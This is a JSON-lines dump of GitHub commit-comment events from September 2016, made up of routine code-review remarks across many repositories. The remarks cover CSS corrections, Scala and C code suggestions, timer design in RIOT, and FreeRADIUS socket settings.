{"id":"4617257278","type":"CommitCommentEvent","actor":{"login":"bestander"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19170889,"position":108,"line":108,"path":"local-cli/upgrade/upgrade.js","commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T11:37:36Z","updated_at":"2016-09-26T11:37:36Z","body":"I wonder if await/async can be used here for better readability and try/catch handling.\r\nLong promise chains is usually quite hard to maintain."}},"created_at":"2016-09-26T11:37:36Z"}
{"id":"4617258182","type":"CommitCommentEvent","actor":{"login":"AyaMorisawa"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":19170891,"position":null,"line":null,"path":null,"commit_id":"3a77c142575f168d552acb0e0298946dbb41e9c1","created_at":"2016-09-26T11:37:50Z","updated_at":"2016-09-26T11:37:50Z","body":"In order to pass Travis CI :star: "}},"created_at":"2016-09-26T11:37:50Z"}
{"id":"4617258243","type":"CommitCommentEvent","actor":{"login":"abique"},"repo":{"name":"abique/conf"},"payload":{"comment":{"id":19170892,"position":4,"line":227,"path":"bash.d/alias.bash","commit_id":"bc919a284251af179f372f1f2f9ca89fa4840d9b","created_at":"2016-09-26T11:37:51Z","updated_at":"2016-09-26T11:37:51Z","body":"haha, that was under control :)"}},"created_at":"2016-09-26T11:37:51Z"}
{"id":"4617260692","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19170898,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T11:38:32Z","updated_at":"2016-09-26T11:38:32Z","body":"That is true. But I'd probably leave that to the implementation. Maybe a new approach will yield better results in mitigating DOS than the one we're thinking of currently.\r\n\r\nI see the following possibilities:\r\n\r\n- Drop responders after X time\r\n- Drop inactive responders after X time\r\n- Drop oldest responder once queue is full\r\n- Drop responder that hasn't sent anything for the longest time once queue is full\r\n\r\n...etc. By not specifying this in the spec, we allow the implementors to come up with good ideas."}},"created_at":"2016-09-26T11:38:32Z"}
{"id":"4617262370","type":"CommitCommentEvent","actor":{"login":"miri64"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":19170903,"position":61,"line":61,"path":"sys/include/evtimer.h","commit_id":"6a978a1fd4dd8a4e212678c0ca9d77f179e574a4","created_at":"2016-09-26T11:39:00Z","updated_at":"2016-09-26T11:39:00Z","body":"I'm asking because: one event-timer per event can be pretty wasteful. Take NDP for example, there are a lot of event types:\r\n\r\n* send delayed NAs\r\n* send delayed RSs\r\n* send and reschedule (unicast and/or multicast) NSs (and stop after certain number of transmissions)\r\n* reschedule NS for 6LoWPAN address registration\r\n* send and reschedule RA (and stop after certain number of transmissions)\r\n* send and reschedule RS (and stop after certain number of transmissions)\r\n* timed state-transitions for each neighbor cache entry (REACHABLE -> STALE, DELAY -> PROBE)\r\n* timeouts of router prefixes, default rouers, 6LoWPAN compression contexts, registered addresses, ...\r\n\r\nthat's a lot of distinct (but mandatory) event-types. And there are probably a few I forgot :D"}},"created_at":"2016-09-26T11:39:00Z"}
{"id":"4617262436","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19170904,"position":19,"line":24,"path":"Entities/Department.cs","commit_id":"cbc622bd69fb4c70d7c64e9a8e9e4f4c8675b08e","created_at":"2016-09-26T11:39:01Z","updated_at":"2016-09-26T11:39:01Z","body":"Det øger læsevenligheden at der er en tom linje mellem hvert summary/field par:\r\n``/// <summary>\r\n/// noget...\r\n/// </summary>\r\ndecimal myVar;\r\n\r\n/// <summary>\r\n/// noget...\r\n/// </summary>\r\ndecimal myVar2;"}},"created_at":"2016-09-26T11:39:01Z"}
{"id":"4617263171","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19170906,"position":null,"line":null,"path":null,"commit_id":"3929cf729997dfcf3656de32401462dbc441b957","created_at":"2016-09-26T11:39:14Z","updated_at":"2016-09-26T11:39:14Z","body":"Merged. @nfeske please check if this reproduces the intended behavior."}},"created_at":"2016-09-26T11:39:14Z"}
{"id":"4617264979","type":"CommitCommentEvent","actor":{"login":"miri64"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":19170912,"position":61,"line":61,"path":"sys/include/evtimer.h","commit_id":"6a978a1fd4dd8a4e212678c0ca9d77f179e574a4","created_at":"2016-09-26T11:39:48Z","updated_at":"2016-09-26T11:39:48Z","body":"Especially if you want to \"peek\" into the future for a certain kind of event, this might be necessary."}},"created_at":"2016-09-26T11:39:48Z"}
{"id":"4617266106","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kyliemks/relaxr-landing-page"},"payload":{"comment":{"id":19170914,"position":37,"line":37,"path":"css/style.css","commit_id":"1998c9650350f1b94a264d3c1fc9731f877f2390","created_at":"2016-09-26T11:40:05Z","updated_at":"2016-09-26T11:40:05Z","body":"Should be \"sans-serif\""}},"created_at":"2016-09-26T11:40:05Z"}
{"id":"4617270126","type":"CommitCommentEvent","actor":{"login":"bestander"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19170921,"position":null,"line":null,"path":null,"commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T11:41:13Z","updated_at":"2016-09-26T11:41:13Z","body":"Looks reasonable.\r\nI don't remember if we pass the JS code through babel in local-cli commands.\r\nIf we do then ES6/ES7 features could be available to us, e.g. Promise does not need to be imported (?).\r\n\r\n"}},"created_at":"2016-09-26T11:41:13Z"}
{"id":"4617271093","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19170923,"position":5,"line":110,"path":"plugins/3MFReader/ThreeMFReader.py","commit_id":"3f9024aeff62a36cf24b2744a1fa9dde7196e1f2","created_at":"2016-09-26T11:41:31Z","updated_at":"2016-09-26T11:41:31Z","body":"More of a sanity check than a self test, I guess."}},"created_at":"2016-09-26T11:41:31Z"}
{"id":"4617274774","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19170933,"position":1,"line":1,"path":"22","commit_id":"abf9f9f74ca36d9fb96c636525172067c3b96691","created_at":"2016-09-26T11:42:35Z","updated_at":"2016-09-26T11:42:35Z","body":"yy"}},"created_at":"2016-09-26T11:42:35Z"}
{"id":"4617276315","type":"CommitCommentEvent","actor":{"login":"jacob4684"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19170936,"position":5,"line":10,"path":"Entities/Department.cs","commit_id":"cbc622bd69fb4c70d7c64e9a8e9e4f4c8675b08e","created_at":"2016-09-26T11:43:02Z","updated_at":"2016-09-26T11:43:02Z","body":"test"}},"created_at":"2016-09-26T11:43:02Z"}
{"id":"4617277894","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19170940,"position":1,"line":1,"path":"22","commit_id":"abf9f9f74ca36d9fb96c636525172067c3b96691","created_at":"2016-09-26T11:43:29Z","updated_at":"2016-09-26T11:43:29Z","body":"yuj"}},"created_at":"2016-09-26T11:43:29Z"}
{"id":"4617278064","type":"CommitCommentEvent","actor":{"login":"bjourne"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19170941,"position":null,"line":null,"path":null,"commit_id":"c6faf98c864213641838f8c4b3cd9ae4cb7cf4f1","created_at":"2016-09-26T11:43:31Z","updated_at":"2016-09-26T11:43:31Z","body":"Slava and Joe Groff knew what they were doing! The while-loop is functionally the same as the if-statement but for some reason I have no idea about it is required to make the compilers generate the best code."}},"created_at":"2016-09-26T11:43:31Z"}
{"id":"4617284493","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19170953,"position":null,"line":null,"path":null,"commit_id":"064b3eff38c5bb0e8438ece8842f6ae0af6a618c","created_at":"2016-09-26T11:45:20Z","updated_at":"2016-09-26T11:45:20Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1038)"}},"created_at":"2016-09-26T11:45:20Z"}
{"id":"4617284856","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19170956,"position":42,"line":88,"path":"docs/package.json","commit_id":"adb9a20f6518917b6e2d7c044729ddbd25d57512","created_at":"2016-09-26T11:45:26Z","updated_at":"2016-09-26T11:45:26Z","body":"no babel optimize for webpack-production ? I thought webpack-production is more important than production because it will be in the client code? "}},"created_at":"2016-09-26T11:45:26Z"}
{"id":"4617289791","type":"CommitCommentEvent","actor":{"login":"LuigiElleBalotta"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19170965,"position":null,"line":null,"path":null,"commit_id":"d4887311e39527e036419ebd966f399fdbdae67a","created_at":"2016-09-26T11:46:49Z","updated_at":"2016-09-26T11:46:49Z","body":"Can you  provide an example of scene scripting?"}},"created_at":"2016-09-26T11:46:49Z"}
{"id":"4617289919","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170966,"position":16,"line":16,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:46:52Z","updated_at":"2016-09-26T11:46:52Z","body":"You can't define multiple font weights, only one per element. And since you're using Google fonts, these should be their numerical versions like 300 or 400 etc. "}},"created_at":"2016-09-26T11:46:52Z"}
{"id":"4617291153","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170976,"position":32,"line":32,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:47:12Z","updated_at":"2016-09-26T11:47:12Z","body":"Missing semi-colon here."}},"created_at":"2016-09-26T11:47:12Z"}
{"id":"4617291635","type":"CommitCommentEvent","actor":{"login":"menshiyun"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19170980,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T11:47:21Z","updated_at":"2016-09-26T11:47:21Z","body":"and there is not Git in ProxSpace :-("}},"created_at":"2016-09-26T11:47:21Z"}
{"id":"4617292483","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170982,"position":54,"line":54,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:47:37Z","updated_at":"2016-09-26T11:47:37Z","body":"Didn't need to set this again since it's set on all elements earlier."}},"created_at":"2016-09-26T11:47:37Z"}
{"id":"4617292782","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19170984,"position":null,"line":null,"path":null,"commit_id":"f366f8b2f68a9431a8915fc4073825b464d238d8","created_at":"2016-09-26T11:47:42Z","updated_at":"2016-09-26T11:47:42Z","body":"see BT#11683"}},"created_at":"2016-09-26T11:47:42Z"}
{"id":"4617293784","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170986,"position":59,"line":59,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:47:57Z","updated_at":"2016-09-26T11:47:57Z","body":"Both margin left and right should be \"auto\" to center align the element."}},"created_at":"2016-09-26T11:47:57Z"}
{"id":"4617293972","type":"CommitCommentEvent","actor":{"login":"htmfilho"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170987,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:48:00Z","updated_at":"2016-09-26T11:48:00Z","body":"Tu peux, peut être, juste utiliser un `int` et un année plus récent parce que, normalement, on peux pas créer un AcademicYear à l'avenir.\r\n\r\n    academic_year = AcademicYear.objects.create(year=2016)"}},"created_at":"2016-09-26T11:48:00Z"}
{"id":"4617294724","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170990,"position":78,"line":78,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:48:13Z","updated_at":"2016-09-26T11:48:13Z","body":"Both margin left and right should be \"auto\" to center align the element."}},"created_at":"2016-09-26T11:48:13Z"}
{"id":"4617297745","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170995,"position":88,"line":88,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:49:02Z","updated_at":"2016-09-26T11:49:02Z","body":"Instead of using margin right to make the width smaller, you should add an inner wrapper and set a width on that."}},"created_at":"2016-09-26T11:49:02Z"}
{"id":"4617298652","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19170996,"position":null,"line":null,"path":null,"commit_id":"04e4dda1e8ce59be9d8d14c5201b44908d22a295","created_at":"2016-09-26T11:49:16Z","updated_at":"2016-09-26T11:49:16Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Vk69NU0rTa-vt019ayiOfQ"}},"created_at":"2016-09-26T11:49:16Z"}
{"id":"4617298689","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19170997,"position":98,"line":98,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:49:16Z","updated_at":"2016-09-26T11:49:16Z","body":"Same here."}},"created_at":"2016-09-26T11:49:16Z"}
{"id":"4617298789","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"robske110/CSphar"},"payload":{"comment":{"id":19170998,"position":null,"line":null,"path":null,"commit_id":"af5a6cdcb1ac4aa86d879079ff48a63cc3508f81","created_at":"2016-09-26T11:49:18Z","updated_at":"2016-09-26T11:49:18Z","body":"nope, too messy"}},"created_at":"2016-09-26T11:49:18Z"}
{"id":"4617299143","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"HE-Arc/EventOrganizer"},"payload":{"comment":{"id":19171001,"position":11,"line":10,"path":"README.md","commit_id":"124ce31419269796ff0e98abcdc20c8ecda145d9","created_at":"2016-09-26T11:49:25Z","updated_at":"2016-09-26T11:49:25Z","body":"Tout ceci est à mon sens _nice to have_. Est-ce que Doodle aurait connu un tel succès s'il fallait s'authentifier pour créer un vote? En laissant ça de côté, vous pourrez vous concentrer sur la partie intéressante de votre problème."}},"created_at":"2016-09-26T11:49:25Z"}
{"id":"4617299571","type":"CommitCommentEvent","actor":{"login":"lolepezy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19171002,"position":262,"line":122,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/store/CacheStore.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:49:32Z","updated_at":"2016-09-26T11:49:32Z","body":".flatMap is quite not effective, I think.\r\nIt could be just .view.map(...).collect(case Success(o) => o)"}},"created_at":"2016-09-26T11:49:32Z"}
{"id":"4617299982","type":"CommitCommentEvent","actor":{"login":"amar-sanakal"},"repo":{"name":"jekyll/jekyll-compose"},"payload":{"comment":{"id":19171006,"position":null,"line":null,"path":null,"commit_id":"9103444942f003a375d1528ec42a1aa607a19b8c","created_at":"2016-09-26T11:49:39Z","updated_at":"2016-09-26T11:49:39Z","body":"@mloberg - looks like the addition of the root directory is causing the current build failure in travis-ci. Could you please care to take a look?"}},"created_at":"2016-09-26T11:49:39Z"}
{"id":"4617302309","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19171011,"position":175,"line":175,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:50:19Z","updated_at":"2016-09-26T11:50:19Z","body":"Since the footer is the entire container, I would call the copyright section something else so it's not confusing."}},"created_at":"2016-09-26T11:50:19Z"}
{"id":"4617302620","type":"CommitCommentEvent","actor":{"login":"omuravskiy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19171013,"position":5,"line":48,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/models/ValidatedObjects.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:50:25Z","updated_at":"2016-09-26T11:50:25Z","body":"It depends on how it is created. In out case we either call .toSeq on Array, or it is converted implicitly from an Array[Byte].\r\nIn both cases it seems to be the WrappedArray, so it uses the underlying array, not a linked list."}},"created_at":"2016-09-26T11:50:25Z"}
{"id":"4617303671","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19171016,"position":186,"line":186,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:50:41Z","updated_at":"2016-09-26T11:50:41Z","body":"Oops, got some extra characters here. Should just be \"auto\"."}},"created_at":"2016-09-26T11:50:41Z"}
{"id":"4617304419","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19171019,"position":194,"line":194,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:50:53Z","updated_at":"2016-09-26T11:50:53Z","body":"Oops, got some extra characters here. Should just be \"auto\"."}},"created_at":"2016-09-26T11:50:53Z"}
{"id":"4617306849","type":"CommitCommentEvent","actor":{"login":"idsv14"},"repo":{"name":"dite-bth/Bucketlist"},"payload":{"comment":{"id":19171024,"position":null,"line":null,"path":null,"commit_id":"e246b0d7e3d8a8bc113dbeb9bdd2b62948f4822e","created_at":"2016-09-26T11:51:34Z","updated_at":"2016-09-26T11:51:34Z","body":"eller?"}},"created_at":"2016-09-26T11:51:34Z"}
{"id":"4617307496","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19171025,"position":196,"line":196,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:51:45Z","updated_at":"2016-09-26T11:51:45Z","body":"Instead of floating and using big padding, you should set inline-block on these elements and use text-align center on the parent container."}},"created_at":"2016-09-26T11:51:45Z"}
{"id":"4617311310","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19171032,"position":1,"line":1,"path":"asdasd","commit_id":"064b3eff38c5bb0e8438ece8842f6ae0af6a618c","created_at":"2016-09-26T11:52:50Z","updated_at":"2016-09-26T11:52:50Z","body":"hjk"}},"created_at":"2016-09-26T11:52:50Z"}
{"id":"4617311313","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"eabarden1010/relaxr-landing-page"},"payload":{"comment":{"id":19171033,"position":15,"line":15,"path":"css/style.css","commit_id":"c7d57960920b2e5176db33685d867863d60e5259","created_at":"2016-09-26T11:52:50Z","updated_at":"2016-09-26T11:52:50Z","body":"This should be \"font-family\" which is why your fonts aren't coming through."}},"created_at":"2016-09-26T11:52:50Z"}
{"id":"4617313219","type":"CommitCommentEvent","actor":{"login":"lolepezy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19171036,"position":5,"line":57,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/api/CacheStoreController.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:53:23Z","updated_at":"2016-09-26T11:53:23Z","body":"Why is this out-commented?"}},"created_at":"2016-09-26T11:53:23Z"}
{"id":"4617313311","type":"CommitCommentEvent","actor":{"login":"omuravskiy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19171037,"position":303,"line":152,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/store/CacheStore.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:53:25Z","updated_at":"2016-09-26T11:53:25Z","body":"Yes, it seems to give problems.\r\nThis method is only used from the tests, so I had to rewrite them to use new instance of CacheStore instead of clean, but forgot to remove this method."}},"created_at":"2016-09-26T11:53:25Z"}
{"id":"4617314990","type":"CommitCommentEvent","actor":{"login":"cypok"},"repo":{"name":"cypok/opk_examples"},"payload":{"comment":{"id":19171045,"position":null,"line":null,"path":null,"commit_id":"386d654ac08eea6cdd8f1c1f6493317e4ace04e6","created_at":"2016-09-26T11:53:51Z","updated_at":"2016-09-26T11:53:51Z","body":"Добавить еще что-нибудь вот такое:\r\n```\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nvoid *maximum(void *arr, size_t elemSize, size_t elemsCount,\r\n\t          int (*cmp)(void*, void*)) {\r\n\t\r\n\tif (elemsCount == 0) {\r\n\t\treturn NULL;\r\n\t}\r\n\r\n\tvoid *max = arr;\r\n\tfor (size_t i = 1; i < elemsCount; i++) {\r\n\t\tvoid *elem = (char*)arr + elemSize * i;\r\n\t\tint cmp_res = cmp(elem, max);\r\n\t\tif (cmp_res == 1) { // elem > max\r\n\t\t\tmax = elem;\r\n\t\t}\r\n\t}\r\n\r\n\treturn max;\r\n}\r\n\r\nint intCmp(int *x, int *y) {\r\n\tint xValue = *x;\r\n\tint yValue = *y;\r\n\r\n\tif (xValue == yValue) {\r\n\t\treturn 0;\r\n\t}\r\n\telse if (xValue < yValue) {\r\n\t\treturn -1;\r\n\t}\r\n\telse {\r\n\t\treturn 1;\r\n\t}\r\n}\r\n\r\nint doubleCmp(double *x, double *y) {\r\n\tdouble xValue = *x;\r\n\tdouble yValue = *y;\r\n\r\n\tif (xValue == yValue) { // not very good\r\n\t\treturn 0;\r\n\t} else if (xValue < yValue) {\r\n\t\treturn -1;\r\n\t} else {\r\n\t\treturn 1;\r\n\t}\r\n}\r\n\r\nint main1(){\r\n\tint ns[] = { 1, 2, 3, 2, 1, 5, 4 };\r\n\tsize_t n_size = sizeof(ns) / sizeof(ns[0]);\r\n\tint *n_max = maximum(ns, sizeof(ns[0]), n_size, intCmp);\r\n\tprintf(\"maximum in ns: %d\\n\", *n_max);\r\n\r\n\r\n\r\n\tdouble ds[] = { 3.7, 4.2, -100, 2 };\r\n\tsize_t d_size = sizeof(ds) / sizeof(ds[0]);\r\n\tdouble *d_max = maximum(ds, sizeof(ds[0]), d_size, doubleCmp);\r\n\tprintf(\"maximum in ds: %g\\n\", *d_max);\r\n\r\n\treturn 0;\r\n}\r\n```"}},"created_at":"2016-09-26T11:53:51Z"}
{"id":"4617315476","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Character"},"payload":{"comment":{"id":19171048,"position":null,"line":null,"path":null,"commit_id":"8b03fae05cec6aa78c346545a05275c12b2e7d5c","created_at":"2016-09-26T11:54:01Z","updated_at":"2016-09-26T11:54:01Z","body":"Prøv at committe det hele igen, for jeg kan ikke se Character.cs\r\n"}},"created_at":"2016-09-26T11:54:01Z"}
{"id":"4617318035","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171057,"position":99,"line":119,"path":"invitations.raml","commit_id":"1af4cc2ee47b0f273f22b58c0dad5cfb72740b95","created_at":"2016-09-26T11:54:42Z","updated_at":"2016-09-26T11:54:42Z","body":"Agreed. Not really sure how to ameliorate this, other than to observe that a naive client might observe the 405 response and try a different method, especially if the error message reflected that.  "}},"created_at":"2016-09-26T11:54:42Z"}
{"id":"4617318310","type":"CommitCommentEvent","actor":{"login":"Thomboline"},"repo":{"name":"Evilwerner/terning"},"payload":{"comment":{"id":19171058,"position":null,"line":null,"path":null,"commit_id":"b7614ff2ad532e8065d2500b4d04877041df914e","created_at":"2016-09-26T11:54:46Z","updated_at":"2016-09-26T11:54:46Z","body":"I'm in motherfucker"}},"created_at":"2016-09-26T11:54:46Z"}
{"id":"4617319957","type":"CommitCommentEvent","actor":{"login":"Diogo-Ferreira"},"repo":{"name":"HE-Arc/EventOrganizer"},"payload":{"comment":{"id":19171064,"position":11,"line":10,"path":"README.md","commit_id":"124ce31419269796ff0e98abcdc20c8ecda145d9","created_at":"2016-09-26T11:55:14Z","updated_at":"2016-09-26T11:55:14Z","body":"C'est vrai qu'avoir l'option de ne pas se connecter ( Et juste utiliser un pseudo) peut être mieux."}},"created_at":"2016-09-26T11:55:14Z"}
{"id":"4617325269","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171078,"position":130,"line":169,"path":"invitations.raml","commit_id":"1af4cc2ee47b0f273f22b58c0dad5cfb72740b95","created_at":"2016-09-26T11:56:47Z","updated_at":"2016-09-26T11:56:47Z","body":"I was debating whether or not to do that--we're then explicitly saying that those resources are coupled. Maybe that's not a bad thing."}},"created_at":"2016-09-26T11:56:47Z"}
{"id":"4617325561","type":"CommitCommentEvent","actor":{"login":"AndreasHeger"},"repo":{"name":"CGATOxford/CGATPipelines"},"payload":{"comment":{"id":19171079,"position":null,"line":null,"path":null,"commit_id":"7b47e2950a9b049787efb0ac5b1e041fc5234ade","created_at":"2016-09-26T11:56:51Z","updated_at":"2016-09-26T11:56:51Z","body":"Thanks, probably over-eager deletion on my part."}},"created_at":"2016-09-26T11:56:51Z"}
{"id":"4617328314","type":"CommitCommentEvent","actor":{"login":"omuravskiy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19171083,"position":5,"line":57,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/api/CacheStoreController.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:57:36Z","updated_at":"2016-09-26T11:57:36Z","body":"Validation time is not there anymore. I moved it next to the downloadTime, because it is only used by the store itself"}},"created_at":"2016-09-26T11:57:36Z"}
{"id":"4617328878","type":"CommitCommentEvent","actor":{"login":"geekbrother"},"repo":{"name":"geeksteam/smpp-sender"},"payload":{"comment":{"id":19171085,"position":15,"line":30,"path":"sender.go","commit_id":"406472d6de384d178483e5499459f299882fdb72","created_at":"2016-09-26T11:57:46Z","updated_at":"2016-09-26T11:57:46Z","body":"It will catch wrong code for codes such +7, +76, for number +76xxxx will be catched +7 code. I think it must be from greater to lower loop."}},"created_at":"2016-09-26T11:57:46Z"}
{"id":"4617335587","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171095,"position":18,"line":18,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:59:37Z","updated_at":"2016-09-26T11:59:37Z","body":"That was my intention. From the RAML spec, the only difference between datetime-only and datetime is that the latter has a timezone offset specified. I'll change it. "}},"created_at":"2016-09-26T11:59:37Z"}
{"id":"4617338907","type":"CommitCommentEvent","actor":{"login":"alandekok"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19171104,"position":null,"line":null,"path":null,"commit_id":"461cfc3bafd36525eec95ea0abb6119205a59382","created_at":"2016-09-26T12:00:26Z","updated_at":"2016-09-26T12:00:26Z","body":"Setting `IPV6_V6ONLY` is intentional.  Feel free to add a configuration option which sets or unsets it.\r\n\r\nThere are multiple issues with accepting v4 packets on v6 sockets.  The BSDs disable that functionality by default, because it's insecure.  The routing rules for v6 may be different from v4, so the replies of v4 over v6 may not go to the same place as plain v4 replies.  And yes, I've run into this.\r\n\r\nWe also want to ensure that the server behaves similarly across all platforms, so the default should be something which works everywhere.\r\n\r\nAdding v4 over v6 means that all of the client lookups fail (as they're family-specific).  And all of the end user rules fail, as they look for v4 addresses, not v4 over v6.  Which means we need to mangle the \"recv\" code so that it checks for v4 over v6, and then convert them back to plain v4.\r\n\r\nOr, we could set set `IPV6_V6ONLY`, and all of these problems go away."}},"created_at":"2016-09-26T12:00:26Z"}
{"id":"4617341696","type":"CommitCommentEvent","actor":{"login":"tobi5648"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19171109,"position":1,"line":1,"path":"Department/Department.cs","commit_id":"b671fdde91fdd1bf6d495eaf66f8de7b11e1ea84","created_at":"2016-09-26T12:01:11Z","updated_at":"2016-09-26T12:01:11Z","body":"Kommentar"}},"created_at":"2016-09-26T12:01:11Z"}
{"id":"4617341866","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19171110,"position":1,"line":1,"path":"asdasd","commit_id":"064b3eff38c5bb0e8438ece8842f6ae0af6a618c","created_at":"2016-09-26T12:01:14Z","updated_at":"2016-09-26T12:01:14Z","body":"dssdf"}},"created_at":"2016-09-26T12:01:14Z"}
